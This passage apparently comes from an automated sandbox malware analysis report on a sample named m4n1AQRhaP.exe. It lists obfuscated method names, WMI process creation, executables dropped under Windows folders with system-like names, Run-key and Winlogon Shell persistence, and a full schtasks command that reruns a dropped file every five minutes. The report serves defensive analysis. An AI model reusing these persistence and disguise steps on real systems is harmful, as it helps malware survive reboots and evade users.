                            Source: m4n1AQRhaP.exe, qHn7y3Hpx5xjm5EEBtB.csHigh entropy of concatenated method names: 'Yi3', 'hJSimEaTLqS', 'YaIHLSr7La', 'Oj4imLaFpml', 'g98Zf5ibXP3cGPiaJqyu', 'tqs64nibHqGuusD9UI0V', 'uBMse3ibcUPASM7ppenV', 'aGno5jibmu996SuSa5X9', 'kKOcJ3ibVk4hQZPlAawk', 'ciDpCRibquuBRWkBJyUK'
                            Source: m4n1AQRhaP.exe, JwtUhvFl4xYRXQ7sH0F.csHigh entropy of concatenated method names: 'Fnm1dQlhtf', 'rYw1is2lJQ', 'KBy1t9prLB', 'tbU1WgpbSu', 'X09159YoRT', 'DeMneniCAhX2cUmLRnxV', 't2OeJjiCWwXYA6He4SFr', 'pNJYWsiC5572lephfIgC', 'gQb2w4iCDOcNq2NT6bME', 'yRxPWFiCctp8wNDxlfDS'
                            Source: m4n1AQRhaP.exe, KSuHiGRFmKnTLWEF3kU.csHigh entropy of concatenated method names: 'SOtROfPxUF', 'KPQRsl5A7M', 'OdcR38PwFU', 'zPhfwEi0QmhZZURPH80s', 'bMrbDki0FQoWCe16I3IF', 'J5rT5Ki01Ao2cR2kp3px', 'yuoLaLi0O76pbEl8XwRi', 'zZEdtHi0sZZoJPmPFsjb', 'oJU15Ni038vpnnWIxBRT', 'HPbNOci0nMhchYYQTOQk'
                            Source: m4n1AQRhaP.exe, YxRVfDiC6UJZ4e3VePZ.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'jV2imsv1UYj', 'u23iWgWM9lo', 'Ln6c1jiRcyLhFowLsdQw', 'UsSB4niRm3OcrTBfsFhe', 'qBl2gtiRX8n4lghxugyA'
                            Source: m4n1AQRhaP.exe, N7oau5ioYqRXeXIRERY.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'XtUimnt01qS', 'u23iWgWM9lo', 'NXbDEqiRNpoQ83SMckhe', 'H143qTiRe5c5EgNyuawx', 'G2U7rOiRkWNl8aBdOY8h'
                            Source: m4n1AQRhaP.exe, OKjL8Ehbc2fXgg5TWsD.csHigh entropy of concatenated method names: 'bYKhu1UoUp', 'iishCmR5DO', 'PNuhYI2Mw0', 'qquhjhojI2', 'gcjh9syYja', 'vt2LtGiTRlVXFcpdCxVx', 'db0JQ9iTxBI2n4wFjGu5', 'cGjNIviThvMrB75JSbvv', 'zxXIVkiTyyBXnHHOaKeZ', 'v6MOM3iTK9OlB78cWbfw'
                            Source: m4n1AQRhaP.exe, HWFZlGthHmSrh5vTwtb.csHigh entropy of concatenated method names: 'O8OtCRSK5d', 'B4bqlCixQVVeShbnnErm', 'GN0fk4ixFowSsmekpZ78', 'sgLUhHixqGnjETxXqRVA', 'LaMAr5ix6QS3emqt5EpS', 'rTh8fKix1e6Y4AYuN8ey', 'h7T4r2ixOEF8wpSKRg9w', 'LZOtPFbtfK', 'PG8tpqE1DN', 'FbytEK5J2Y'
                            Source: m4n1AQRhaP.exe, B0twwKcpb59lpIG1cer.csHigh entropy of concatenated method names: 'qvtc08XIBk', 'OQTcSRP5aB', 'X3vcTDSyR3', 'tTvFS8iEUEyiVP1MkCxC', 'd7P9aoiE70cFb7M5krrR', 'xdtqPeiEIMLYBgHtMriS', 'BElCb0iE4AZv5CVYDpC3', 'ijhcLLLNXF', 'cdLc8BH2fO', 'lTTcbBaVJT'
                            Source: m4n1AQRhaP.exe, bFBObtX9BfapDu9gBBi.csHigh entropy of concatenated method names: 'IDV', 'd65', 'IjvimRvsBF4', 'RDSi5d0rLjT', 'BWjXG0AYP6', 'El1odTi8cBopE9VHrqLn', 'cgdmfDi8m6Jy413BS76a', 'I5YHuyi8XlW0JHr4eUD2', 'xjEJomi8HewEewC6ap0Q', 'SrhsCCi8VBEktfyrZ3QC'
                            Source: m4n1AQRhaP.exe, p8XUgU5C42ApmUoTgF5.csHigh entropy of concatenated method names: 'Te95TZFZJi', 'nJgjixi2r84em5rwtAlk', 'xNZ2Uoi284T0fmUZXZFM', 'DCLLbei2bLsGfuH2uxeM', 'hndOjQi2un22MyXNrgMM', 'BL55jSQWq6', 'aAE597ZaE2', 'w4M5w9niWR', 'up5NA5i2PIiTp1Ur7Mls', 'LPGjgIi2pvfRgbCZrJWA'
                            Source: m4n1AQRhaP.exe, puOJTTWS3aGif4OG976.csHigh entropy of concatenated method names: 'huhWJj0v8D', 'KvITclihxxiTMtZXskhL', 'm3FiOIihKYcdb6yxxcLP', 'EYAgReihR6f4jOcZWalm', 'tQl4JwihhxWqLCUSrnSS', 'whDWgbAh5D', 'lXCXXSih7x7nCwXqGVqU', 'gPWJDIihN7yE71OBt3Kv', 'lmaDTXihetwfOH8uOF2X', 'nhsNSVih4sLsNKX6pej5'
                            Source: m4n1AQRhaP.exe, rmlEf1vlgxi4Ag3KDas.csHigh entropy of concatenated method names: 'YhiMtWT69C', 'p3VMW6Xjxf', 'yPcXmJiBCVaZbgkpQUe0', 'aKQqG2iBY5MyBjOHKI5x', 'gE2gNPiBrU7p4VbsTsli', 'nWOOuTiBuNV4UVhoWprV', 'JRCfVliBjjSmahpho0fx', 'mGV6YWiB9ZWibVewwrwH', 'evwMd1xyX1', 'INahwiiBEZf8TfwkgWKn'
                            Source: m4n1AQRhaP.exe, g4k3FXhWyyqUIdrVcMk.csHigh entropy of concatenated method names: 'eewhApUm4O', 'j6YhDZeOf9', '_7Bm', 'mPLhciEf5B', 'AcOhm80Y26', 'vlGhXRTg5s', 's76hHJnF4D', 'iPCNXsiS9uQ3rvMCYwx7', 'PNU0eHiSY4vyKdXJQYEF', 'N9RgrwiSjZjBT3HJVl2Y'
                            Source: m4n1AQRhaP.exe, UW4urEtmDirmU2n9h5N.csHigh entropy of concatenated method names: 'wlqtHe4Mvo', 'Bi7tVt3WGn', 'LlVtq6753f', 'tuMePkiRrq67T6fml2l7', 't52j6UiRu4INJVPpNkwN', 'FBtxmeiRCYU65ZOm2JMX', 'LI9DlAiRYAjsfwFsKCE3', 'oVM6SniRjctVh7xO3d70', 'OCasGqiR9AqHFOHdvOPU', 'r6THNDiRw2Mms4pqQJLj'
                            Source: m4n1AQRhaP.exe, xwiPNbXKFKcBYQVZRfO.csHigh entropy of concatenated method names: '_71a', 'd65', 'NMMi5VsY6CD', 'wHDi5qxveT1', 'I81imyZ24hV', 'RDSi5d0rLjT', 'HNrBHKiLgMXPlv3P56Dl', 'cuvfIUiLf2jLuR5FE7sT', 'ji4V9fiLJQoTRiPxJyZa', 'dWgw3giLvZsnPD7YEN3W'
                            Source: m4n1AQRhaP.exe, F2fZvsDwyAMEyx39k4h.csHigh entropy of concatenated method names: 'LaIcdSK2EF', 'vThciv1KYQ', 'wJUctqvhoJ', 'CFrsnmipjyT8CX8We19l', 'QRL2f9ip96YjfeMAgli4', 'EYI8FEipC9QUOhP1gbu4', 'k6Vlc6ipYuKRLeKYrljG', 'bDtD0WBtID', 'QAcDSgCdmj', 'l0DDT8SJtB'
                            Source: m4n1AQRhaP.exe, ULkHpNQPbNjsH5BbTMk.csHigh entropy of concatenated method names: 'j9l', 'T4ZQEMHQgA', 'cXMQLiQHxN', 'tTlQ84kxQj', 'ui0QbGiDK2', 'B0SQrOHIC9', 'jrKQuHG8po', 'e5HIMfiuN3wBSBxWWUwe', 'iDLPpOiuUKy0QAOBONeo', 'uwcKpZiu7j7jtogI9QJe'
                            Source: m4n1AQRhaP.exe, ldrQgnfax5oqqu4RR0j.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'mTqfZ5SqHt', 'fNafljIU0o', 'rENfzJvZCk', '_0023Nn', 'Dispose', 'unlNMZioMRGIklOaXB7g', 'T9mps5iooLyG1c1HY1vo'
                            Source: m4n1AQRhaP.exe, WkNJStVhvGt1NoJIAut.csHigh entropy of concatenated method names: 'g5H6nBhNVo', 'GOwlipiruk4wMBKOPoTO', 'VolrkMirb3iCA5gHCHxy', 'CNpNk2irr4UiURPObs33', 'mrCRWCirCLuh9lIjdsLQ', 'Fq8VPnquTr', 'UCnVpp0mwp', 'iUDVEuAgWT', 'cqXVLOZpY1', 'Be7V8ObMjU'
                            Source: m4n1AQRhaP.exe, nA2AswWLBswtneUPfHV.csHigh entropy of concatenated method names: 'ljuWbJGPXZ', 'oBmWrA0Gr7', 'QAYWuVvcOb', 'iJZWC7NZCl', 'dtpWYYfiPu', 'jZ3WjGHxEd', 'aveW9NbIQm', 'PofWw4tX71', 'SKeWG1gQar', 'PgPW0AVFbl'
                            Source: m4n1AQRhaP.exe, Il6tBucNZdwodjk3PtQ.csHigh entropy of concatenated method names: 'EtechLfBx0', 'jGC1IBiEXFXwdJ5O4IX7', 'PR4hOsiEHSyC4A3QMjRE', 'zRmUMIiEcg9Ibc4r6mfx', 'l11UNsiEmBXjbcRmOaDY', 'KrQckv0s71', 'WDinjCiEdrSHMHHtSaoi', 'fr6RfsiEiq8rugqSpZq5', 'eGqYAhiEtkDSZHb7tdNB', 'GvhFOEiEWdjcqk1lgLoo'
                            Source: m4n1AQRhaP.exe, vqgCZNRW9QfAmJdDdLN.csHigh entropy of concatenated method names: 'wctRAGMLys', 'U8VRDeD8gI', 'jwORcbLSsk', 'OjFRmfAwuJ', 'wtyRXZomjr', 'VoZitri0dKNvZEKACkPg', 'UiLw8Wi0ihPiG36AbUs7', 'kubxkgi0tyG42vCmeQvK', 'YbOaNji0WO1WpL4rBGSR', 'X2AsCIi05KFSZfmmNXWu'
                            Source: m4n1AQRhaP.exe, CdR9UMWHtnekxgntbNc.csHigh entropy of concatenated method names: 'ko7WqbKiG4', 'kVAW6eGu5E', 'fX3WQHJntE', 'zK4CHtixgCZcmku6hKGj', 'YmVpxeixfCTJPeNuYsXJ', 'wagH28ixS9HqCdlxM7Xr', 'vIX6fHixTsXkGjnhFCBj', 'rQjtPbixJhV6wRFhrxu8', 'dyPwjFixvfZJkFNIAAGC', 'WOI2EwixMmBaL2YwUhmt'
                            Source: m4n1AQRhaP.exe, UYNyH9PDHqPTKRtXDBk.csHigh entropy of concatenated method names: 'nrDkDeig8dTr8Tw2EP1b', 'qPgwm4igEKPxFCi8nTBl', 'NMxCqBigLeNDxq33hDRQ', 'M4xXM3igbSlYjbT9kUNv', 'f6xPmTCc4Q', '_1R8', '_3eK', 'pHLPXx492n', 'fePPHYN5hS', 'eDfPVR4mjl'
                            Source: m4n1AQRhaP.exe, L9lBqmgfTdt7mGMdWGR.csHigh entropy of concatenated method names: 'GVFimGyZPGb', 'wXNgv8FcnY', 'bL2gMEQtIW', 'qHugo1HOL4', 'GLL04liM8ZeHMeIlFOOn', 'PuiTsuiMbiqAJxSlrjqt', 'doFXpriMrlhtFjsShd4u', 'VlVXiFiMucoc47uMbjoE', 'FVDkceiMCmkRcNxBKFQO', 'OqoZUZiMYyq4bs04LB6q'
                            Source: m4n1AQRhaP.exe, INCsx6A6fCmxdElxcFw.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'ewoim4Oj9kG', 'I8tiWz0heU7', 'CYu1LDiPiUOOYrI7I0gx', 'TYQsVniPtOxfX7LU10ch', 'IelTsMiPWrLgIhkKHfMM', 'rVpQ2IiP5J5KsFUiW0eL', 'WoRqbTiPAWnE9aIVcrXp'
                            Source: m4n1AQRhaP.exe, ckViN3DcabkT2U3MytR.csHigh entropy of concatenated method names: 'MfRDI6QMaO', 'CnPD4k3eAX', 'F4yDFFiPZ9giHH9xxfdg', 'xVp1XLiPabgWtflOeM0x', 'MBgHAGiPBU4vHg134CEY', 'CvEDssv7EY', 'D65D3Mk9U8', 'sisC8giPJwqW4DTk6JxG', 'mh8iSkiPvtdbnr8i5lmN', 't4EnCmiPMQqK0d9EjvPu'
                            Source: m4n1AQRhaP.exe, UhjuEV78MfH5PnFjiq4.csHigh entropy of concatenated method names: 'dWeKkAZKPY', 'pvQKyX1tpr', 'ARDb3ViGLtHmLdc64S51', 'e54rr8iGphLyvg2ZEYjE', 'FKTxQAiGEvyR5CY37aCu', 'Jddfm5iG8ZGe0DWF5L2Z', 'kUwlPqiGbDRdRwDYOvtR', 'qIZKPK9SO7', 'IoNQkTiGuIa8Tsq8Pxa1', 'ArKbrIiGCmXHbpeVe10l'

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: unknownExecutable created and started: C:\Windows\bcastdvr\uwTuxQS3V.exe
                            Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe
                            Source: unknownExecutable created and started: C:\Windows\IME\en-GB\Registry.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\rCwnUSpv.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\ISkSYroH.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\qLTnEFIs.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\mgFxlINb.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\MilkDJCZ.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\kSqObZEE.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Recovery\upfc.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\IME\en-GB\Registry.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\bJiZPSMv.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\paINcIrQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\ZzLYPzhu.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\RBEiIUto.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\bcastdvr\uwTuxQS3V.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\kmqOzLcc.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\gXpxUtOK.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\IME\en-GB\Registry.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\bcastdvr\uwTuxQS3V.exeJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\mgFxlINb.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\MilkDJCZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\kmqOzLcc.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\bJiZPSMv.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\ZzLYPzhu.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\paINcIrQ.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\rCwnUSpv.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\kSqObZEE.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\RBEiIUto.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\ISkSYroH.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\qLTnEFIs.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile created: C:\Users\user\Desktop\gXpxUtOK.logJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3VJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbisJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3VJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ikEtBZXIKU1m0GnJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Recovery\upfc.exe'" /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbisJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbisJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbisJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iHstGpVMr4QFhc62UUbisJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3VJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3VJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3VJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run uwTuxQS3VJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ikEtBZXIKU1m0GnJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ikEtBZXIKU1m0GnJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
